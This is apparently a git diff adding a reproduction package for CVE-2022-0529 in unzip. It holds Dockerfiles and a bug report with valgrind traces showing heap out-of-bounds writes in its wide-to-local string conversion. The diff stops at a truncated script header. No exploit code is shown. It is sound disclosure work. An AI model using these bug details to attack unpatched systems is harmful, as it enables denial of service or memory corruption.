diff --git a/cve/unzip/2022/CVE-2022-0529/Dockerfile-fedora b/cve/unzip/2022/CVE-2022-0529/Dockerfile-fedora new file mode 100644 index 0000000000000000000000000000000000000000..27b138710977475506c1f4f6f4577106b83f6a80 --- /dev/null +++ b/cve/unzip/2022/CVE-2022-0529/Dockerfile-fedora @@ -0,0 +1,4 @@ +FROM fedora:35 + +RUN dnf install -y yum-utils valgrind unzip +RUN debuginfo-install -y unzip diff --git a/cve/unzip/2022/CVE-2022-0529/Dockerfile-ubuntu b/cve/unzip/2022/CVE-2022-0529/Dockerfile-ubuntu new file mode 100644 index 0000000000000000000000000000000000000000..63f22735c74af6d6b55bf971ed7d7758833050c1 --- /dev/null +++ b/cve/unzip/2022/CVE-2022-0529/Dockerfile-ubuntu @@ -0,0 +1,11 @@ +FROM ubuntu:20.04 +ENV DEBIAN_FRONTEND noninteractive + +RUN apt update && apt install lsb-core ubuntu-dbgsym-keyring debian-goodies -y +RUN apt-key adv --keyserver keyserver.ubuntu.com --recv-keys F2EDC64DC5AEE1F6B9C621F0C8CAB6595FDFF622 +RUN echo "deb http://ddebs.ubuntu.com $(lsb_release -cs) main restricted universe multiverse \ + deb http://ddebs.ubuntu.com $(lsb_release -cs)-updates main restricted universe multiverse \ + deb http://ddebs.ubuntu.com $(lsb_release -cs)-proposed main restricted universe multiverse" | \ + tee -a /etc/apt/sources.list.d/ddebs.list + +RUN apt update && apt install valgrind libbz2-1.0-dbgsym unzip-dbgsym -y diff --git a/cve/unzip/2022/CVE-2022-0529/README.txt b/cve/unzip/2022/CVE-2022-0529/README.txt new file mode 100644 index 0000000000000000000000000000000000000000..804d27e7c05a10387cd732c3f43ce5d9cba3439c --- /dev/null +++ b/cve/unzip/2022/CVE-2022-0529/README.txt @@ -0,0 +1,520 @@ +Heap out-of-bound writes and reads during conversion of wide string to local string + +# Description +During extraction of the attached zip archive via +``` +unzip $PWD/testcase +``` +out-of-bounds reads and writes happen on an heap-allocated buffer. The bug is located +in the code that is responsible for converting wide strings to local strings. + +This bug allows an attacker to perform a denial of service and possibly opens up +other attack vectors. + +To reproduce the crash, we provide scripts alongside the crashing input: +- ./reproduce-fedora.sh: Reproduce crash via a Fedora 35 docker container +- ./reproduce-ubuntu.sh: Reproduce crash via a Ubuntu 20.04 docker container + +If you need further details, we are happy to assist where possible. + +# yum info unzip +Last metadata expiration check: 0:04:07 ago on Mon Jan 31 12:39:57 2022. +Installed Packages +Name : unzip +Version : 6.0 +Release : 53.fc35 +Architecture : x86_64 +Size : 385 k +Source : unzip-6.0-53.fc35.src.rpm +Repository : @System +From repo : fedora +Summary : A utility for unpacking zip files +URL : http://www.info-zip.org/UnZip.html +License : BSD +Description : The unzip utility is used to list, test, or extract files from a zip + : archive. Zip archives are commonly found on MS-DOS systems. The zip + : utility, included in the zip package, creates zip archives. Zip and + : unzip are both compatible with archives created by PKWARE(R)'s PKZIP + : for MS-DOS, but the programs' options and default behaviors do differ + : in some respects. + : + : Install the unzip package if you need to list, test or extract files from + : a zip archive. + +# valgrind fedora +==1== Memcheck, a memory error detector +==1== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. +==1== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info +==1== Command: unzip /testcase +==1== +Archive: /testcase +warning [/testcase]: 303 extra bytes at beginning or within zipfile + (attempting to process anyway) +error [/testcase]: reported length of central directory is + -303 bytes too long (Atari STZip zipfile? J.H.Holm ZIPSPLIT 1.1 + zipfile?). Compensating... +==1== Invalid write of size 1 +==1== at 0x484732C: strcat (vg_replace_strmem.c:330) +==1== by 0x11CD25: UnknownInlinedFun (string_fortified.h:127) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2547) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2600) +==1== by 0x11CD25: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid write of size 1 +==1== at 0x484733E: strcat (vg_replace_strmem.c:330) +==1== by 0x11CD25: UnknownInlinedFun (string_fortified.h:127) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2547) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2600) +==1== by 0x11CD25: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3d2 is 9 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 1 +==1== at 0x4847314: strcat (vg_replace_strmem.c:330) +==1== by 0x11CD25: UnknownInlinedFun (string_fortified.h:127) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2547) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2600) +==1== by 0x11CD25: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 1 +==1== at 0x4847604: strlen (vg_replace_strmem.c:494) +==1== by 0x11CE8C: UnknownInlinedFun (process.c:2551) +==1== by 0x11CE8C: UnknownInlinedFun (process.c:2600) +==1== by 0x11CE8C: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 8 +==1== at 0x484B214: memmove (vg_replace_strmem.c:1382) +==1== by 0x11CEAE: UnknownInlinedFun (string_fortified.h:79) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2552) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2600) +==1== by 0x11CEAE: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3d0 is 7 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 8 +==1== at 0x484B21F: memmove (vg_replace_strmem.c:1382) +==1== by 0x11CEAE: UnknownInlinedFun (string_fortified.h:79) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2552) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2600) +==1== by 0x11CEAE: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3d8 is 15 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 8 +==1== at 0x484B227: memmove (vg_replace_strmem.c:1382) +==1== by 0x11CEAE: UnknownInlinedFun (string_fortified.h:79) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2552) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2600) +==1== by 0x11CEAE: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3e0 is 23 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== + +valgrind: m_mallocfree.c:303 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed. +valgrind: Heap block lo/hi size mismatch: lo = 672, hi = 3689347702328406576. +This is probably caused by your program erroneously writing past the +end of a heap block and corrupting heap metadata. If you fix any +invalid writes reported by Memcheck, this assertion failure will +probably go away. Please try that before reporting this as a bug. + + +host stacktrace: +==1== at 0x580428CA: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x580429F7: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x58042B9B: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x5804C8EF: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x5803AF1A: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x58039637: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x5803DFBD: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x580388E8: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x5800F344: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x1002DF0984: ??? +==1== by 0x1002CB5F2F: ??? +==1== by 0x581FCDA3: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x1002CB5F17: ??? +==1== by 0x1002CB5F2F: ??? + +sched status: + running_tid=1 + +Thread 1: status = VgTs_Runnable (lwpid 1) +==1== at 0x484B22F: memmove (vg_replace_strmem.c:1382) +==1== by 0x11CEAE: UnknownInlinedFun (string_fortified.h:79) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2552) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2600) +==1== by 0x11CEAE: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +client stack range: [0x1FFEFFE000 0x1FFF000FFF] client SP: 0x1FFF000868 +valgrind stack range: [0x1002BB6000 0x1002CB5FFF] top usage: 8656 of 1048576 + + +# apt-show unzip +Package: unzip +Version: 6.0-25ubuntu1 +Priority: optional +Section: utils +Origin: Ubuntu +Maintainer: Ubuntu Developers +Original-Maintainer: Santiago Vila +Bugs: https://bugs.launchpad.net/ubuntu/+filebug +Installed-Size: 593 kB +Depends: libbz2-1.0, libc6 (>= 2.14) +Suggests: zip +Homepage: http://www.info-zip.org/UnZip.html +Task: ubuntu-desktop-minimal, ubuntu-desktop, kubuntu-desktop, xubuntu-core, xubuntu-desktop, lubuntu-desktop, ubuntustudio-desktop-core, ubuntustudio-desktop, ubuntukylin-desktop, ubuntu-mate-core, ubuntu-mate-desktop, ubuntu-budgie-desktop +Download-Size: 169 kB +APT-Manual-Installed: yes +APT-Sources: http://archive.ubuntu.com/ubuntu focal/main amd64 Packages +Description: De-archiver for .zip files + +# valgrind Ubuntu +==1== Memcheck, a memory error detector +==1== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. +==1== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info +==1== Command: unzip /testcase +==1== +Archive: /testcase +warning [/testcase]: 303 extra bytes at beginning or within zipfile + (attempting to process anyway) +error [/testcase]: reported length of central directory is + -303 bytes too long (Atari STZip zipfile? J.H.Holm ZIPSPLIT 1.1 + zipfile?). Compensating... +==1== Invalid write of size 1 +==1== at 0x483EC4C: strcat (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E65D: strcat (string_fortified.h:128) +==1== by 0x11E65D: wide_to_local_string (process.c:2555) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid write of size 1 +==1== at 0x483EC5E: strcat (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E65D: strcat (string_fortified.h:128) +==1== by 0x11E65D: wide_to_local_string (process.c:2555) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3d2 is 9 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 1 +==1== at 0x483EC34: strcat (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E65D: strcat (string_fortified.h:128) +==1== by 0x11E65D: wide_to_local_string (process.c:2555) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Conditional jump or move depends on uninitialised value(s) +==1== at 0x11E6B7: wide_to_local_string (process.c:2559) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 4 +==1== at 0x11E6A2: wide_to_local_string (process.c:2559) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3cc is 3 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 4 +==1== at 0x11E6B7: wide_to_local_string (process.c:2559) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3d0 is 7 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 8 +==1== at 0x4842A7C: memmove (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E6FA: strcpy (string_fortified.h:90) +==1== by 0x11E6FA: wide_to_local_string (process.c:2560) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3d0 is 7 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 8 +==1== at 0x4842A87: memmove (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E6FA: strcpy (string_fortified.h:90) +==1== by 0x11E6FA: wide_to_local_string (process.c:2560) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3d8 is 15 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 8 +==1== at 0x4842A8F: memmove (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E6FA: strcpy (string_fortified.h:90) +==1== by 0x11E6FA: wide_to_local_string (process.c:2560) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3e0 is 23 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== + +valgrind: m_mallocfree.c:305 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed. +valgrind: Heap block lo/hi size mismatch: lo = 672, hi = 3689347702328406576. +This is probably caused by your program erroneously writing past the +end of a heap block and corrupting heap metadata. If you fix any +invalid writes reported by Memcheck, this assertion failure will +probably go away. Please try that before reporting this as a bug. + + +host stacktrace: +==1== at 0x58046FFA: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x58047127: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x580472CB: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x580514B4: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x5803DE9A: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x5803CD9F: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x58041F04: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x5803C1D8: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x58017AF4: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-amd64-linux) +==1== by 0x1002EC5614: ??? +==1== by 0x1002DB5F2F: ??? +==1== by 0x1002DB5F17: ??? +==1== by 0x1002DB5F2F: ??? +==1== by 0x1002DB5F3F: ??? + +sched status: + running_tid=1 + +Thread 1: status = VgTs_Runnable (lwpid 1) +==1== at 0x4842A97: memmove (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E6FA: strcpy (string_fortified.h:90) +==1== by 0x11E6FA: wide_to_local_string (process.c:2560) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +client stack range: [0x1FFEFFE000 0x1FFF000FFF] client SP: 0x1FFF0008A8 +valgrind stack range: [0x1002CB6000 0x1002DB5FFF] top usage: 18248 of 1048576 diff --git a/cve/unzip/2022/CVE-2022-0529/reproduce-fedora.sh b/cve/unzip/2022/CVE-2022-0529/reproduce-fedora.sh new file mode 100644 index 0000000000000000000000000000000000000000..cf70224311605a0a7f33cf8988b8fea9aeb7e3a7 --- /dev/null +++ b/cve/unzip/2022/CVE-2022-0529/reproduce-fedora.sh @@ -0,0 